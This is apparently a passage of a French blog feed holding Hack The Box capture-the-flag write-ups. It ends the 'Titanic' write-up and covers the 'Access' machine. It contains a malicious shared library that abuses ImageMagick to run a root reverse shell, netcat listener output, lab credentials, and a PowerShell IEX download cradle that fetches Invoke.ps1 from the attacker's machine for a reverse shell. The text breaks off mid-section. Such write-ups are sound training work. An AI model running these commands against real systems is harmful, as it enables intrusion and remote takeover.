target="_blank" rel="noopener" >https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">developer@titanic:/opt/app/static/assets/images$ find / -writable -type d 2&gt;/dev/null <span class="p">|</span> head </span></span><span class="line"><span class="cl">/sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service </span></span><span class="line"><span class="cl">/sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/app.slice </span></span><span class="line"><span class="cl">/sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/app.slice/dbus.socket </span></span><span class="line"><span class="cl">/sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/app.slice/gpg-agent.service </span></span><span class="line"><span class="cl">/sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/app.slice/dbus.service </span></span><span class="line"><span class="cl">/sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service/init.scope </span></span><span class="line"><span class="cl">/opt/app/static/assets/images </span></span><span class="line"><span class="cl">/opt/app/tickets </span></span><span class="line"><span class="cl">/home/developer </span></span><span class="line"><span class="cl">/home/developer/.gnupg </span></span></code></pre></td></tr></table> </div> </div><p>On trouve ces dossiers: /opt/app/static/assets/images /opt/app/tickets</p> <p>Avec ce script:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">developer@titanic:/opt/app/static/assets/images$ cat /opt/scripts/identify_images.sh </span></span><span class="line"><span class="cl"><span class="nb">cd</span> /opt/app/static/assets/images </span></span><span class="line"><span class="cl">truncate -s <span class="m">0</span> metadata.log </span></span><span class="line"><span class="cl">find /opt/app/static/assets/images/ -type f -name <span class="s2">&#34;*.jpg&#34;</span> <span class="p">|</span> xargs /usr/bin/magick identify &gt;&gt; metadata.log </span></span></code></pre></td></tr></table> </div> </div><p>On recherche une CVE pour magick, on trouve que notre version est vulnerable. On trouve le github, on suit les instructions. On construit une fausse librairie qui va executer du code en tant que root. il execute un shell.sh que j&rsquo;ai defini et qui ouvre un revershell.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">gcc -x c -shared -fPIC -o ./libxcb.so.1 - <span class="s">&lt;&lt; EOF </span></span></span><span class="line"><span class="cl"><span class="s">##include &lt;stdio.h&gt; </span></span></span><span class="line"><span class="cl"><span class="s">##include &lt;stdlib.h&gt; </span></span></span><span class="line"><span class="cl"><span class="s">##include &lt;unistd.h&gt; </span></span></span><span class="line"><span class="cl"><span class="s"> </span></span></span><span class="line"><span class="cl"><span class="s">__attribute__((constructor)) void init(){ </span></span></span><span class="line"><span class="cl"><span class="s"> system(&#34;/opt/app/static/assets/images/shell.sh&#34;); </span></span></span><span class="line"><span class="cl"><span class="s"> exit(0); </span></span></span><span class="line"><span class="cl"><span class="s">} </span></span></span><span class="line"><span class="cl"><span class="s">EOF</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Titanic<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">6666</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">6666</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.2<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.55<span class="o">]</span> <span class="m">51460</span> </span></span><span class="line"><span class="cl">sh: 0: can<span class="err">&#39;</span>t access tty<span class="p">;</span> job control turned off </span></span><span class="line"><span class="cl"><span class="c1"># whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1"># cat /root/root.txt</span> </span></span><span class="line"><span class="cl">c304.....3cde </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li>ATTENTION !! Le piège : on ne trouve rien avec <code>gobuster dns</code>. A l&rsquo;avenir, il faut prioriser ABSOLUMENT <code>ffuf</code> pour trouver les sous-domaines !!</li> </ul>https://leopoldabgn.github.io/writeups/p/access-htb/Tue, 18 Feb 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/access-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Access cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Access</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.98</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">security : 4Cc3ssC0ntr0ller </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.98 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">21/tcp open ftp syn-ack ttl <span class="m">127</span> Microsoft ftpd </span></span><span class="line"><span class="cl"><span class="p">|</span> ftp-anon: Anonymous FTP login allowed <span class="o">(</span>FTP code 230<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_Can<span class="err">&#39;</span>t get directory listing: TIMEOUT </span></span><span class="line"><span class="cl"><span class="p">|</span> ftp-syst: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ SYST: Windows_NT </span></span><span class="line"><span class="cl">23/tcp open telnet syn-ack ttl <span class="m">127</span> Microsoft Windows XP telnetd </span></span><span class="line"><span class="cl"><span class="p">|</span> telnet-ntlm-info: </span></span><span class="line"><span class="cl"><span class="p">|</span> Target_Name: ACCESS </span></span><span class="line"><span class="cl"><span class="p">|</span> NetBIOS_Domain_Name: ACCESS </span></span><span class="line"><span class="cl"><span class="p">|</span> NetBIOS_Computer_Name: ACCESS </span></span><span class="line"><span class="cl"><span class="p">|</span> DNS_Domain_Name: ACCESS </span></span><span class="line"><span class="cl"><span class="p">|</span> DNS_Computer_Name: ACCESS </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Product_Version: 6.1.7600 </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">127</span> Microsoft IIS httpd 7.5 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-IIS/7.5 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span> Supported Methods: OPTIONS TRACE GET HEAD POST </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Potentially risky methods: TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: MegaCorp </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="ftp-anonymous-connexion-gettings-2-files">FTP Anonymous connexion: Gettings 2 files </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access/Access Control<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ftp 10.10.10.98 </span></span><span class="line"><span class="cl">Connected to 10.10.10.98. </span></span><span class="line"><span class="cl"><span class="m">220</span> Microsoft FTP Service </span></span><span class="line"><span class="cl">Name <span class="o">(</span>10.10.10.98:kali<span class="o">)</span>: anonymous </span></span><span class="line"><span class="cl"><span class="m">331</span> Anonymous access allowed, send identity <span class="o">(</span>e-mail name<span class="o">)</span> as password. </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl"><span class="m">230</span> User logged in. </span></span><span class="line"><span class="cl">Remote system <span class="nb">type</span> is Windows_NT. </span></span><span class="line"><span class="cl">ftp&gt; dir </span></span><span class="line"><span class="cl"><span class="m">425</span> Cannot open data connection. </span></span><span class="line"><span class="cl"><span class="m">200</span> PORT <span class="nb">command</span> successful. </span></span><span class="line"><span class="cl"><span class="m">150</span> Opening ASCII mode data connection. </span></span><span class="line"><span class="cl">08-23-18 08:16PM &lt;DIR&gt; Backups </span></span><span class="line"><span class="cl">08-24-18 09:00PM &lt;DIR&gt; Engineer </span></span><span class="line"><span class="cl"><span class="m">226</span> Transfer complete. </span></span><span class="line"><span class="cl">ftp&gt; <span class="nb">cd</span> Backups </span></span><span class="line"><span class="cl"><span class="m">250</span> CWD <span class="nb">command</span> successful. </span></span><span class="line"><span class="cl">ftp&gt; dir </span></span><span class="line"><span class="cl"><span class="m">200</span> PORT <span class="nb">command</span> successful. </span></span><span class="line"><span class="cl"><span class="m">125</span> Data connection already open<span class="p">;</span> Transfer starting. </span></span><span class="line"><span class="cl">08-23-18 08:16PM <span class="m">5652480</span> backup.mdb </span></span><span class="line"><span class="cl"><span class="m">226</span> Transfer complete. </span></span><span class="line"><span class="cl">ftp&gt; <span class="nb">cd</span> ../Engineer </span></span><span class="line"><span class="cl"><span class="m">250</span> CWD <span class="nb">command</span> successful. </span></span><span class="line"><span class="cl">ftp&gt; dir </span></span><span class="line"><span class="cl"><span class="m">200</span> PORT <span class="nb">command</span> successful. </span></span><span class="line"><span class="cl"><span class="m">150</span> Opening ASCII mode data connection. </span></span><span class="line"><span class="cl">08-24-18 12:16AM <span class="m">10870</span> Access Control.zip </span></span><span class="line"><span class="cl"><span class="m">226</span> Transfer complete. </span></span><span class="line"><span class="cl">ftp&gt; ^D </span></span><span class="line"><span class="cl"><span class="m">221</span> Goodbye. </span></span></code></pre></td></tr></table> </div> </div><h3 id="backupmdb-and-access-controlzip">backup.mdb and Access Control.zip </h3><p>En analysant les tables disponibles dans le fichier backup.mdb, on trouve la table &ldquo;auth_user&rdquo; qui contient un champs PASSWORD potentiellement intéressant.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ mdb-schema backup.mdb <span class="p">|</span> grep -i PASSWORD -A30 -B30 </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">CREATE TABLE <span class="o">[</span>auth_user<span class="o">]</span> </span></span><span class="line"><span class="cl"> <span class="o">(</span> </span></span><span class="line"><span class="cl"> <span class="o">[</span>id<span class="o">]</span> Long Integer, </span></span><span class="line"><span class="cl"> <span class="o">[</span>username<span class="o">]</span> Text <span class="o">(</span>50<span class="o">)</span>, </span></span><span class="line"><span class="cl"> <span class="o">[</span>password<span class="o">]</span> Text <span class="o">(</span>50<span class="o">)</span>, </span></span><span class="line"><span class="cl"> <span class="o">[</span>Status<span class="o">]</span> Long Integer, </span></span><span class="line"><span class="cl"> <span class="o">[</span>last_login<span class="o">]</span> DateTime, </span></span><span class="line"><span class="cl"> <span class="o">[</span>RoleID<span class="o">]</span> Long Integer, </span></span><span class="line"><span class="cl"> <span class="o">[</span>Remark<span class="o">]</span> Memo/Hyperlink <span class="o">(</span>255<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>On extrait la table auth_user et on récupère 3 credentials user/password.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ mdb-export backup.mdb auth_user </span></span><span class="line"><span class="cl">id,username,password,Status,last_login,RoleID,Remark </span></span><span class="line"><span class="cl">25,<span class="s2">&#34;admin&#34;</span>,<span class="s2">&#34;admin&#34;</span>,1,<span class="s2">&#34;08/23/18 21:11:47&#34;</span>,26, </span></span><span class="line"><span class="cl">27,<span class="s2">&#34;engineer&#34;</span>,<span class="s2">&#34;access4u@security&#34;</span>,1,<span class="s2">&#34;08/23/18 21:13:36&#34;</span>,26, </span></span><span class="line"><span class="cl">28,<span class="s2">&#34;backup_admin&#34;</span>,<span class="s2">&#34;admin&#34;</span>,1,<span class="s2">&#34;08/23/18 21:14:02&#34;</span>,26, </span></span></code></pre></td></tr></table> </div> </div><p>En ftp et telnet, aucun ne fonctionne. Cependant, en utilisant le mot de passe &ldquo;access4u@security&rdquo; sur le fichier &ldquo;Access Control.zip&rdquo;, l&rsquo;archive se décompresse correctement !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ 7z x Access<span class="se">\ </span>Control.zip </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">7-Zip 24.09 <span class="o">(</span>x64<span class="o">)</span> : Copyright <span class="o">(</span>c<span class="o">)</span> 1999-2024 Igor Pavlov : 2024-11-29 </span></span><span class="line"><span class="cl"> 64-bit <span class="nv">locale</span><span class="o">=</span>en_US.UTF-8 Threads:3 OPEN_MAX:1024 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Scanning the drive <span class="k">for</span> archives: </span></span><span class="line"><span class="cl"><span class="m">1</span> file, <span class="m">10870</span> bytes <span class="o">(</span><span class="m">11</span> KiB<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Extracting archive: Access Control.zip </span></span><span class="line"><span class="cl">-- </span></span><span class="line"><span class="cl"><span class="nv">Path</span> <span class="o">=</span> Access Control.zip </span></span><span class="line"><span class="cl"><span class="nv">Type</span> <span class="o">=</span> zip </span></span><span class="line"><span class="cl">Physical <span class="nv">Size</span> <span class="o">=</span> <span class="m">10870</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Enter password <span class="o">(</span>will not be echoed<span class="o">)</span>: <span class="o">&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</span>&lt; access4u@security </span></span><span class="line"><span class="cl">Everything is Ok </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Size: <span class="m">271360</span> </span></span><span class="line"><span class="cl">Compressed: <span class="m">10870</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ls </span></span><span class="line"><span class="cl"><span class="s1">&#39;Access Control.pst&#39;</span> <span class="s1">&#39;Access Control.zip&#39;</span> auth_user.txt backup.mdb </span></span></code></pre></td></tr></table> </div> </div><h3 id="extracting-emails-from-pst-file">Extracting emails from pst file </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ readpst -r Access<span class="se">\ </span>Control.pst </span></span><span class="line"><span class="cl">Opening PST file and indexes... </span></span><span class="line"><span class="cl">Processing Folder <span class="s2">&#34;Deleted Items&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;Access Control&#34;</span> - <span class="m">2</span> items <span class="k">done</span>, <span class="m">0</span> items skipped. </span></span></code></pre></td></tr></table> </div> </div><h3 id="getting-security-account-password-from-emails">Getting &ldquo;security&rdquo; account password from emails </h3><p>security: <code>4Cc3ssC0ntr0ller</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access/Access Control<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ cat mbox <span class="p">|</span> grep pass </span></span><span class="line"><span class="cl">The password <span class="k">for</span> the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers. </span></span><span class="line"><span class="cl">&lt;/o:shapelayout&gt;&lt;/xml&gt;&lt;!<span class="o">[</span>endif<span class="o">]</span>--&gt;&lt;/head&gt;&lt;body <span class="nv">lang</span><span class="o">=</span>EN-US <span class="nv">link</span><span class="o">=</span><span class="s2">&#34;#0563C1&#34;</span> <span class="nv">vlink</span><span class="o">=</span><span class="s2">&#34;#954F72&#34;</span>&gt;&lt;div <span class="nv">class</span><span class="o">=</span>WordSection1&gt;&lt;p <span class="nv">class</span><span class="o">=</span>MsoNormal&gt;Hi there,&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;p <span class="nv">class</span><span class="o">=</span>MsoNormal&gt;&lt;o:p&gt;<span class="p">&amp;</span>nbsp<span class="p">;</span>&lt;/o:p&gt;&lt;/p&gt;&lt;p <span class="nv">class</span><span class="o">=</span>MsoNormal&gt;The password <span class="k">for</span> the <span class="p">&amp;</span><span class="c1">#8220;security&amp;#8221; account has been changed to 4Cc3ssC0ntr0ller.&amp;nbsp; Please ensure this is passed on to your engineers.&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;p class=MsoNormal&gt;&lt;o:p&gt;&amp;nbsp;&lt;/o:p&gt;&lt;/p&gt;&lt;p class=MsoNormal&gt;Regards,&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;p class=MsoNormal&gt;John&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="telnet---security-account">TELNET - security account </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access/Access Control<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ telnet 10.10.10.98 <span class="m">23</span> </span></span><span class="line"><span class="cl">Trying 10.10.10.98... </span></span><span class="line"><span class="cl">Connected to 10.10.10.98. </span></span><span class="line"><span class="cl">Escape character is <span class="s1">&#39;^]&#39;</span>. </span></span><span class="line"><span class="cl">Welcome to Microsoft Telnet Service </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">login: security </span></span><span class="line"><span class="cl">password: 4Cc3ssC0ntr0ller </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*<span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Microsoft Telnet Server. </span></span><span class="line"><span class="cl">*<span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\s</span>ecurity&gt;type Desktop<span class="se">\u</span>ser.txt </span></span><span class="line"><span class="cl">9535.....3f75 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="powershell">Powershell </h3><p>Si j&rsquo;écris simplement &ldquo;powershell&rdquo;, un powershell semble s&rsquo;ouvrir mais n&rsquo;est pas stable. J&rsquo;ai donc dû ouvrir un reverse shell pour obtenir un powershell stable :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">----------KALI------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 -m http.server <span class="m">8888</span> </span></span><span class="line"><span class="cl">Serving HTTP on 0.0.0.0 port <span class="m">8888</span> <span class="o">(</span>http://0.0.0.0:8888/<span class="o">)</span> ... </span></span><span class="line"><span class="cl">10.10.10.98 - - <span class="o">[</span>16/Feb/2025 17:04:22<span class="o">]</span> <span class="s2">&#34;GET /Invoke.ps1 HTTP/1.1&#34;</span> <span class="m">200</span> - </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------KALI------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Access<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.16.9<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.98<span class="o">]</span> <span class="m">49165</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Windows PowerShell running as user security on ACCESS </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> <span class="m">2015</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\s</span>ecurity&gt;PS C:<span class="se">\U</span>sers<span class="se">\s</span>ecurity&gt; whoami </span></span><span class="line"><span class="cl">access<span class="se">\s</span>ecurity </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">---------WINDOWS---------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\U</span>sers<span class="se">\s</span>ecurity&gt;powershell /C IEX<span class="o">(</span>New-Object Net.WebClient<span class="o">)</span>.downloadString<span class="o">(</span><span class="s1">&#39;http://10.10.16.9:8888/Invoke.ps1&#39;</span><span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="zkaccesslnk">ZKAccess.lnk </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span 